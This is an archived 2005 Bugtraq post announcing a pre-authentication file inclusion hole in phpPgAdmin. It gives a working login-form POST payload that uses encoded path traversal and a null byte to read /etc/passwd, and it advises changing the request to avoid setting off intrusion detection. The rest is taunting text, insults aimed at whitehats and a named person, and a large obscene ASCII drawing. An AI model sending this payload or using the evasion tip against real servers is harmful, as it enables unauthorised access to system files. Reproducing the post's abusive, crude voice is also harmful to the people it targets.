| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200507050224.j652Oe9V045593@mailserver3.hushmail.com>
Date: Mon, 4 Jul 2005 19:24:37 -0700
From: <rznvynqqe@...hmail.com>
To: <bugtraq@...urityfocus.com>
Cc: dailydave@...ts.immunitysec.com
Subject: !!! pre-authenticated remote code inclusion
vulnerability inside phppgadmin !!!
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
NOTE: this advisory complies with draft-christey-wysopal-vuln-
disclosure-00.txt
!!! pre-authenticated remote code inclusion vulnerability inside
phppgadmin !!!
What is this stuff?
phpPgAdmin is a web-based administration tool for
PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting
services. phpPgAdmin is one of the best database front-ends
available.
you cant get this in stores man!
remote pre-auth file inclusion vulnerability brought to you by bad
method of data
usage, found by twigglestick (also known as vengeful striking
hammer of
god), massive 0day finding ALF member. Remember, DON'T USE THIS
VULNERABILITY TO BREAK
PORN SITES, PORN IS GOOD. ALSO ALL YOU WHITEHATS ARE BAD, VERY VERY
BAD. OK
THNX.
install phppgadmin (http://phppgadmin.sourceforge.net/)
post to login form
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login
*Remeber kiddies, many of stupid IDS will go off when you do this,
so change file!
and saying 'FUCK PETE SHIPLEY' while doing it.
remember programmer, don't include user input directly into the
code, its too easy
to make mistakes, think default deny policy for example, with
explicit allows.
this also is cross-site with server errors working, but we don't
care about that.
bye for now!
|| __ _ __ || <> __ ___ __ _ || <>
__ ||
|| / \| / _] ||// |//\\ /\|| | /\\ / \ |/ \ _||
/ _] ||//
||/\ ||| | ||_ |<< || || || <__|| | ] |||| || /<>| ||
||_ |<<
|| || \__/| \__] ||\\ || || || ___|| || \__/ || \__| ||
\__] ||\\
SSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:SSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:::SSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSS::::::SS
SSSSSSSSSSSSSSS:::::::::::::::::::::NS
SSSSSSSSSSSSSS::nnnnnnn,::::::,nnnnnN
SSSSSSSSSSSSS::':::::::::::::/:::::N
SSSSSSSNNNNSS:::;oO@@Oo;::::::;oO@@n
SSSSSSN::::SS::::::::::::::::::::::N
SSSSSSN:::::::::::::::::::::::::::::N
SSSSSSN::::::::::::::::::::::::::::N
SSSSSSNN:::::::::::::::nNNn:::::::N
SSSSSS:N::::::::::::::::::::::::N
SSSSS:NN::::::::::::::::::::::N /-----------
- ----------\
SSS::::NNN::::::::"NNNNNNN:::N -----/ 0day give
me hard-on \ N:::::::NNN:::::::"NnnN:::N
\ wanna touch it? /
N::::::::::NNN:::::::::::N \---------------------/
NN::::::NN::::NNN:::::::N
NN::::::::NNN::::NNNNNNNN
N::::::::::::NN:::::::N
NN::::::::::::::NN::::::N
NNNN:::::::::::::::::N::::N
NN::::::::::::::::::NNNNNN::N
NN::::::::::::::::::::::::NNNNN
N::::::::::::::::::::::::::::NNN
N:::::::::::::::::::::::::::::::NN
NN:::::::::::::::::::::::N:::::::::N
N:::::::::::::::::::::::::N:::::::::N
N:::::::::::::::::::::::::N::::::::::N
N:::::::::::::::::::::::::N:::::::::::N
NN::::::::::::::::::::::::N::::::::::::N
N:::::::::::::::::::::::N::::::::::::::N
N:::::::::::::::::::::N::::::::::::::::N
NN::::::::::::::::::N:N::::::::::::::::N
N:NN::::::::::::::NN::N::::::::::::::::N
N:::N::::::::::::N:::::N:::::::::::::::N
N:::::::::::::::NN::::::N::::::::::::::oo
N::::::::::::::::::::::::N::::::::::::o@@
N::::::::::::::::::::::::N:::::::::::No'
N::::::::::::::::::::::::N::::::::NNNN
N::::::::::::::::::::::::N:::::::N:::N
N::::::::::::::::::::::::N::::::::::NN
N::::::::::::::::::::::::N:::::::::::N
N::::::::::::::::::::::N:::::N::::::N
NNNNNNNNNNNN
N:::N::::::::::::::::::N::::N::::::N
N::::::::::::NN
N:::N::::::::::::::::N:::::N::::N
NNNN:::::NNNNNNNNNN
N:::N::::::::::::::NNN::::::N::::N
N::::::::::::::NN
N:::N::::::::::::::::NN::::::N:::NNNNNNNNNNNNNNNNNN:::::::::::()::NN
N:::N:::::::::::::::::NNNNNNNNNNN::::::::::::::::::::::::::::::NNN
N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN
N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::NNN
N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN
N::::::N::::::::NNNN::::::::::::::::::::::::NNNN::::::::::::::::NNN
N:::::::N::::::::::::NNNNNNN::::::::::NNNNNNN:::::::::::::::::()::NN
N::::::::N::::::::::::::::::NNNNNNNNNN:::::::::::::::::::::::::::NN
N:::::::::NN:::::::::::::::::::::::::::::::NNNNNNNNNNNNNNNNNNNNNNN
N:::::::::::NN::::::::::::::::::::::NNNNNNN NNNNN
N::::::::::::::::::::::::::NNNNNNNN NN:::::0
NNN::::::::::::NNNNNNNNNNN:::::::N N><::::::N
N:NNNNNNNNNNNN::::::::::::::::::N NN::><:::::N
N:::::::::::::::::::::::::::::::N NN:::::><:::N
N::::::::::::::::::::::::::::::::N NN::::::::><NN
N::::::::::::::::::::::::::::::::N NN:::::::::NN
N:::::::::::::::::::::::::::::::::N# NN:::::::::NN
N::::::::::::::::::::::::::::::::::N##:::::::::NN
N::::::::::::::::::::::::::::::::::N####:::::NN
N:::::::::::N::::::::::::::::::::::N####:::NN
N:::::::::::NN:::::::::::::::::::::N####:NN
N:::::::::::NNN:::::::::::::::::::NN####N
N:::::::::::NN:N::::::::::::::::::N######
N:::::::::::N:::::::::::::::::::::N!#####
N:::::::::N::::::::::::::::::::::N!!###N
N::::::::::::::::::::::::::::::::N!!###NN
N::::::::::::::::::::::::::::::::N!!!!!NN
NN:::::::::::::::::::::::::::::::N!!!!!N:N
NN::::::::::::::::::::::::::::::N!!!!!!N:N
NNN::::::::::::::::::::::::::::N!!!!!!N::N
NN:::::::::::::::::::::::::::::N!!!!!N:::N
N:::::::::::::::::::::::::::::N!!!!!!N:::N
N:::::::::::::::::::::::::::::N!!!!!!:::::N
N:::::::::::::::::::::::::::::N!!!!!N::::::N
N:::::::::::::::::::::::::::::N!!!!!N:::::::N
N:::::::::::::::::::::::::::::N!!!!N:::::::::N
N:::::::::::::::::::::::::::::NNNNN:::::::::::N
N::::::::::::::::::::::::::::N:::::::::::::::::N
N::::::::::::::::::::::::::::N::::::::::::::::::N
N::::::::::::::::::::::::::::N:::::::::::::::::::N
N:::::::::::N::::::::::::::::N::::::::::::::::::::N
N::::::::::N:::::::::::::::::NN::::::::::::::::::::N
N::::::::::N:::::::::::::::::NNN::::::::::::::::::::N
N::::::::::N:::::::::::::::::N:NN::::::::::::::::::::N
N::::::::::N::::::::::::::::N::::NN:::::::::::::::::::N
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkLJ4c0ACgkQZvG4N6tdg63x2gCfYBjgFnFRU6EyEVRQ4IFnm9iLfLoA
nAi4IBh+YFO5EaG2iAaB8LFf6Oxx
=hxv0
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
Powered by blists - more mailing lists